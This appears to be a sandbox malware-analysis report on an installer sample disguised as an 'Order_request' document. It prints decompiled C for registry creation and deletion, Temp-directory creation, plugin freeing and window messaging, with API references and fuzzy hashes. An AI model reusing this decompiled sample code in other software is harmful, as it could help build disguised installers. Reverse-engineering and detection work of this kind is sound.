                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 551687249-2449383134
                                                              • Opcode ID: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
                                                              • Instruction ID: c5c4fbc020d382a06f3b5c516385cf2f0b989405556926c34d029951a3a1b574
                                                              • Opcode Fuzzy Hash: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
                                                              • Instruction Fuzzy Hash: EC519B31801209EBCB10CFA5DA44B9F7BB8AF55726F1441BBE914B72C1C7789E008BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 954 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 961 4023c7-4023cf 954->961 962 402a4c-402a5b 954->962 963 4023d1-4023de call 402bbf lstrlenW 961->963 964 4023e2-4023e5 961->964 963->964 968 4023f5-4023f8 964->968 969 4023e7-4023f4 call 402ba2 964->969 972 402409-40241d RegSetValueExW 968->972 973 4023fa-402404 call 403027 968->973 969->968 975 402422-4024fc RegCloseKey 972->975 976 40241f 972->976 973->972 975->962 976->975
                                                              C-Code - Quality: 85%
                                                              			E0040237B(void* __eax) {
                                                              				void* _t17;
                                                              				short* _t20;
                                                              				int _t21;
                                                              				long _t24;
                                                              				char _t26;
                                                              				int _t29;
                                                              				intOrPtr _t37;
                                                              				void* _t39;
                                                              
                                                              				_t17 = E00402CB4(__eax);
                                                              				_t37 =  *((intOrPtr*)(_t39 - 0x1c));
                                                              				 *(_t39 - 0x34) =  *(_t39 - 0x18);
                                                              				 *(_t39 - 8) = E00402BBF(2);
                                                              				_t20 = E00402BBF(0x11);
                                                              				 *(_t39 - 4) = 1;
                                                              				_t21 = RegCreateKeyExW(_t17, _t20, _t29, _t29, _t29,  *0x7a8af0 | 0x00000002, _t29, _t39 + 8, _t29); // executed
                                                              				if(_t21 == 0) {
                                                              					if(_t37 == 1) {
                                                              						E00402BBF(0x23);
                                                              						_t21 = lstrlenW(0x40b5c8) + _t28 + 2;
                                                              					}
                                                              					if(_t37 == 4) {
                                                              						_t26 = E00402BA2(3);
                                                              						 *0x40b5c8 = _t26;
                                                              						_t21 = _t37;
                                                              					}
                                                              					if(_t37 == 3) {
                                                              						_t21 = E00403027( *((intOrPtr*)(_t39 - 0x20)), _t29, 0x40b5c8, 0x1800); // executed
                                                              					}
                                                              					_t24 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 8), _t29,  *(_t39 - 0x34), 0x40b5c8, _t21); // executed
                                                              					if(_t24 == 0) {
                                                              						 *(_t39 - 4) = _t29;
                                                              					}
                                                              					_push( *(_t39 + 8));
                                                              					RegCloseKey();
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                                              				return 0;
                                                              			}











                                                              0x0040237c
                                                              0x00402381
                                                              0x0040238b
                                                              0x00402395
                                                              0x00402398
                                                              0x004023b2
                                                              0x004023b9
                                                              0x004023c1
                                                              0x004023cf
                                                              0x004023d3
                                                              0x004023de
                                                              0x004023de
                                                              0x004023e5
                                                              0x004023e9
                                                              0x004023ef
                                                              0x004023f4
                                                              0x004023f4
                                                              0x004023f8
                                                              0x00402404
                                                              0x00402404
                                                              0x00402415
                                                              0x0040241d
                                                              0x0040241f
                                                              0x0040241f
                                                              0x00402422
                                                              0x004024f6
                                                              0x004024f6
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp
                                                              • API String ID: 1356686001-89864070
                                                              • Opcode ID: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
                                                              • Instruction ID: eb15040666a4b84098e37ffbf96cc219ad532b268eb93921d51e5d7316b4335f
                                                              • Opcode Fuzzy Hash: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
                                                              • Instruction Fuzzy Hash: 9B119D71A00108BEEB11AFA4DE89DAE76BDEB44358F11403AF904B21D1DAB89E409668
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 979 405660-4056ab CreateDirectoryW 980 4056b1-4056be GetLastError 979->980 981 4056ad-4056af 979->981 982 4056d8-4056da 980->982 983 4056c0-4056d4 SetFileSecurityW 980->983 981->982 983->981 984 4056d6 GetLastError 983->984 984->982
                                                              C-Code - Quality: 100%
                                                              			E00405660(WCHAR* _a4) {
                                                              				struct _SECURITY_ATTRIBUTES _v16;
                                                              				struct _SECURITY_DESCRIPTOR _v36;
                                                              				int _t22;
                                                              				long _t23;
                                                              
                                                              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                              				_v36.Owner = 0x4083b0;
                                                              				_v36.Group = 0x4083b0;
                                                              				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                              				_v16.lpSecurityDescriptor =  &_v36;
                                                              				_v36.Revision = 1;
                                                              				_v36.Control = 4;
                                                              				_v36.Dacl = 0x4083a0;
                                                              				_v16.nLength = 0xc;
                                                              				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                              				if(_t22 != 0) {
                                                              					L1:
                                                              					return 0;
                                                              				}
                                                              				_t23 = GetLastError();
                                                              				if(_t23 == 0xb7) {
                                                              					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                              						goto L1;
                                                              					}
                                                              					return GetLastError();
                                                              				}
                                                              				return _t23;
                                                              			}







                                                              0x0040566b
                                                              0x0040566f
                                                              0x00405672
                                                              0x00405678
                                                              0x0040567c
                                                              0x00405680
                                                              0x00405688
                                                              0x0040568f
                                                              0x00405695
                                                              0x0040569c
                                                              0x004056a3
                                                              0x004056ab
                                                              0x004056ad
                                                              0x00000000
                                                              0x004056ad
                                                              0x004056b7
                                                              0x004056be
                                                              0x004056d4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004056d6
                                                              0x004056da

                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056A3
                                                              • GetLastError.KERNEL32 ref: 004056B7
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056CC
                                                              • GetLastError.KERNEL32 ref: 004056D6
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405686
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 3449924974-3355392842
                                                              • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                              • Instruction ID: a656050947ebfef5167fdf4c2b21dc35e266e59b00d64b4b83911e60c27c7584
                                                              • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                              • Instruction Fuzzy Hash: 94010871D00619EBEF019FA0C9087EFBBB8EB14314F10443AD549B6280E77996148FA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 985 402bff-402c28 RegOpenKeyExW 986 402c93-402c97 985->986 987 402c2a-402c35 985->987 988 402c50-402c60 RegEnumKeyW 987->988 989 402c62-402c74 RegCloseKey call 406408 988->989 990 402c37-402c3a 988->990 998 402c76-402c85 989->998 999 402c9a-402ca0 989->999 992 402c87-402c8a RegCloseKey 990->992 993 402c3c-402c4e call 402bff 990->993 995 402c90-402c92 992->995 993->988 993->989 995->986 998->986 999->995 1000 402ca2-402cb0 RegDeleteKeyW 999->1000 1000->995 1002 402cb2 1000->1002 1002->986
                                                              C-Code - Quality: 84%
                                                              			E00402BFF(void* _a4, short* _a8, intOrPtr _a12) {
                                                              				void* _v8;
                                                              				short _v532;
                                                              				long _t18;
                                                              				intOrPtr* _t27;
                                                              				long _t28;
                                                              
                                                              				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x7a8af0 | 0x00000008,  &_v8); // executed
                                                              				if(_t18 == 0) {
                                                              					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                              						if(_a12 != 0) {
                                                              							RegCloseKey(_v8);
                                                              							L8:
                                                              							return 1;
                                                              						}
                                                              						if(E00402BFF(_v8,  &_v532, 0) != 0) {
                                                              							break;
                                                              						}
                                                              					}
                                                              					RegCloseKey(_v8);
                                                              					_t27 = E00406408(3);
                                                              					if(_t27 == 0) {
                                                              						if( *0x7a8af0 != 0) {
                                                              							goto L8;
                                                              						}
                                                              						_t28 = RegDeleteKeyW(_a4, _a8);
                                                              						if(_t28 != 0) {
                                                              							goto L8;
                                                              						}
                                                              						return _t28;
                                                              					}
                                                              					return  *_t27(_a4, _a8,  *0x7a8af0, 0);
                                                              				}
                                                              				return _t18;
                                                              			}








                                                              0x00402c20
                                                              0x00402c28
                                                              0x00402c50
                                                              0x00402c3a
                                                              0x00402c8a
                                                              0x00402c90
                                                              0x00000000
                                                              0x00402c92
                                                              0x00402c4e
                                                              0x00000000
                                                              0x00000000
                                                              0x00402c4e
                                                              0x00402c65
                                                              0x00402c6d
                                                              0x00402c74
                                                              0x00402ca0
                                                              0x00000000
                                                              0x00000000
                                                              0x00402ca8
                                                              0x00402cb0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402cb0
                                                              0x00000000
                                                              0x00402c83
                                                              0x00402c97

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
                                                              • Instruction ID: 96ecc02dbfbaaadde43e4edb48da855e10ebdec385bf1e19a14d4c4ac13e51f4
                                                              • Opcode Fuzzy Hash: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
                                                              • Instruction Fuzzy Hash: 4E116A72904119BFEF109F90DF8CEAE3B79FB54384B10403AF906A10A0D7B48E55AA69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                              				void _v36;
                                                              				struct HINSTANCE__* _t34;
                                                              				intOrPtr _t38;
                                                              				void* _t44;
                                                              				void* _t45;
                                                              				void* _t46;
                                                              				void* _t50;
                                                              				intOrPtr _t53;
                                                              				signed int _t57;
                                                              				signed int _t61;
                                                              				void* _t65;
                                                              				void* _t66;
                                                              				void* _t70;
                                                              				void* _t74;
                                                              
                                                              				_t74 = __esi;
                                                              				_t66 = __edi;
                                                              				_t65 = __edx;
                                                              				 *0x1000406c = _a8;
                                                              				 *0x10004070 = _a16;
                                                              				 *0x10004074 = _a12;
                                                              				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                              				_push(1); // executed
                                                              				_t34 = E10001B18(); // executed
                                                              				_t50 = _t34;
                                                              				if(_t50 == 0) {
                                                              					L28:
                                                              					return _t34;
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                              						E10002286(_t50);
                                                              					}
                                                              					_push(_t50);
                                                              					E100022D0(_t65);
                                                              					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                              					if(_t53 == 0xffffffff) {
                                                              						L14:
                                                              						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                              							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                              								_t34 = E100024A9(_t50);
                                                              							} else {
                                                              								_push(_t74);
                                                              								_push(_t66);
                                                              								_t12 = _t50 + 0x1018; // 0x1018
                                                              								_t57 = 8;
                                                              								memcpy( &_v36, _t12, _t57 << 2);
                                                              								_t38 = E100015B4(_t50);
                                                              								_t15 = _t50 + 0x1018; // 0x1018
                                                              								_t70 = _t15;
                                                              								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                              								 *_t70 = 4;
                                                              								E100024A9(_t50);
                                                              								_t61 = 8;
                                                              								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                              							}
                                                              						} else {
                                                              							E100024A9(_t50);
                                                              							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                              						}
                                                              						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                              							_t34 = E1000246C(_t50);
                                                              							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                              								_t34 =  *(_t50 + 0x1008);
                                                              								if(_t34 != 0) {
                                                              									_t34 = FreeLibrary(_t34);
                                                              								}
                                                              							}
                                                              							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                              								_t34 = E1000153D( *0x10004068);
                                                              							}
                                                              						}
                                                              						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                              							goto L28;
                                                              						} else {
                                                              							return GlobalFree(_t50);
                                                              						}
                                                              					}
                                                              					_t44 =  *_t50;
                                                              					if(_t44 == 0) {
                                                              						if(_t53 != 1) {
                                                              							goto L14;
                                                              						}
                                                              						E10002B5F(_t50);
                                                              						L12:
                                                              						_t50 = _t44;
                                                              						L13:
                                                              						goto L14;
                                                              					}
                                                              					_t45 = _t44 - 1;
                                                              					if(_t45 == 0) {
                                                              						L8:
                                                              						_t44 = E100028A4(_t53, _t50); // executed
                                                              						goto L12;
                                                              					}
                                                              					_t46 = _t45 - 1;
                                                              					if(_t46 == 0) {
                                                              						E10002645(_t50);
                                                              						goto L13;
                                                              					}
                                                              					if(_t46 != 1) {
                                                              						goto L14;
                                                              					}
                                                              					goto L8;
                                                              				}
                                                              			}

















                                                              0x10001759
                                                              0x10001759
                                                              0x10001759
                                                              0x10001763
                                                              0x1000176b
                                                              0x10001778
                                                              0x10001786
                                                              0x10001789
                                                              0x1000178b
                                                              0x10001790
                                                              0x10001795
                                                              0x100018a8
                                                              0x100018a8
                                                              0x1000179b
                                                              0x1000179f
                                                              0x100017a2
                                                              0x100017a7
                                                              0x100017a8
                                                              0x100017a9
                                                              0x100017af
                                                              0x100017b5
                                                              0x100017e5
                                                              0x100017ec
                                                              0x10001810
                                                              0x1000184f
                                                              0x10001812
                                                              0x10001812
                                                              0x10001813
                                                              0x10001816
                                                              0x1000181c
                                                              0x10001820
                                                              0x10001823
                                                              0x10001828
                                                              0x10001828
                                                              0x1000182f
                                                              0x10001835
                                                              0x1000183b
                                                              0x10001847
                                                              0x10001848
                                                              0x1000184b
                                                              0x100017ee
                                                              0x100017ef
                                                              0x10001804
                                                              0x10001804
                                                              0x10001859
                                                              0x1000185c
                                                              0x10001869
                                                              0x10001870
                                                              0x10001878
                                                              0x1000187b
                                                              0x1000187b
                                                              0x10001878
                                                              0x10001888
                                                              0x10001890
                                                              0x10001895
                                                              0x10001888
                                                              0x1000189d
                                                              0x00000000
                                                              0x1000189f
                                                              0x00000000
                                                              0x100018a0
                                                              0x1000189d
                                                              0x100017b9
                                                              0x100017bc
                                                              0x100017da
                                                              0x00000000
                                                              0x00000000
                                                              0x100017dd
                                                              0x100017e2
                                                              0x100017e2
                                                              0x100017e4
                                                              0x00000000
                                                              0x100017e4
                                                              0x100017be
                                                              0x100017bf
                                                              0x100017c7
                                                              0x100017c8
                                                              0x00000000
                                                              0x100017c8
                                                              0x100017c1
                                                              0x100017c2
                                                              0x100017d0
                                                              0x00000000
                                                              0x100017d0
                                                              0x100017c5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x100017c5

                                                              APIs
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                              • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                              • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                                              • String ID:
                                                              • API String ID: 1791698881-3916222277
                                                              • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                              • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                              • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                              • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 51%
                                                              			E00401BDF() {
                                                              				signed int _t28;
                                                              				WCHAR* _t31;
                                                              				long _t32;
                                                              				int _t37;
                                                              				signed int _t38;
                                                              				int _t42;
                                                              				int _t48;
                                                              				struct HWND__* _t52;
                                                              				void* _t55;
                                                              
                                                              				 *(_t55 - 0x14) = E00402BA2(3);
                                                              				 *(_t55 + 8) = E00402BA2(4);
                                                              				if(( *(_t55 - 0x18) & 0x00000001) != 0) {
                                                              					 *((intOrPtr*)(__ebp - 0x14)) = E00402BBF(0x33);
                                                              				}
                                                              				__eflags =  *(_t55 - 0x18) & 0x00000002;
                                                              				if(( *(_t55 - 0x18) & 0x00000002) != 0) {
                                                              					 *(_t55 + 8) = E00402BBF(0x44);
                                                              				}
                                                              				__eflags =  *((intOrPtr*)(_t55 - 0x30)) - 0x21;
                                                              				_push(1);
                                                              				if(__eflags != 0) {
                                                              					_t50 = E00402BBF();
                                                              					_t28 = E00402BBF();
                                                              					asm("sbb ecx, ecx");
                                                              					asm("sbb eax, eax");
                                                              					_t31 =  ~( *_t27) & _t50;
                                                              					__eflags = _t31;
                                                              					_t32 = FindWindowExW( *(_t55 - 0x14),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
                                                              					goto L10;
                                                              				} else {
                                                              					_t52 = E00402BA2();
                                                              					_t37 = E00402BA2();
                                                              					_t48 =  *(_t55 - 0x18) >> 2;
                                                              					if(__eflags == 0) {
                                                              						_t32 = SendMessageW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8));
                                                              						L10:
                                                              						 *(_t55 - 8) = _t32;
                                                              					} else {
                                                              						_t38 = SendMessageTimeoutW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                              						asm("sbb eax, eax");
                                                              						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                              					}
                                                              				}
                                                              				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - _t42;
                                                              				if( *((intOrPtr*)(_t55 - 0x2c)) >= _t42) {
                                                              					_push( *(_t55 - 8));
                                                              					E00405F79();
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t55 - 4));
                                                              				return 0;
                                                              			}












                                                              0x00401be8
                                                              0x00401bf4
                                                              0x00401bf7
                                                              0x00401c00
                                                              0x00401c00
                                                              0x00401c03
                                                              0x00401c07
                                                              0x00401c10
                                                              0x00401c10
                                                              0x00401c13
                                                              0x00401c17
                                                              0x00401c19
                                                              0x00401c66
                                                              0x00401c68
                                                              0x00401c73
                                                              0x00401c7d
                                                              0x00401c80
                                                              0x00401c80
                                                              0x00401c89
                                                              0x00000000
                                                              0x00401c1b
                                                              0x00401c22
                                                              0x00401c24
                                                              0x00401c2c
                                                              0x00401c2f
                                                              0x00401c57
                                                              0x00401c8f
                                                              0x00401c8f
                                                              0x00401c31
                                                              0x00401c3f
                                                              0x00401c47
                                                              0x00401c4a
                                                              0x00401c4a
                                                              0x00401c2f
                                                              0x00401c92
                                                              0x00401c95
                                                              0x00401c9b
                                                              0x004029f2
                                                              0x004029f2
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
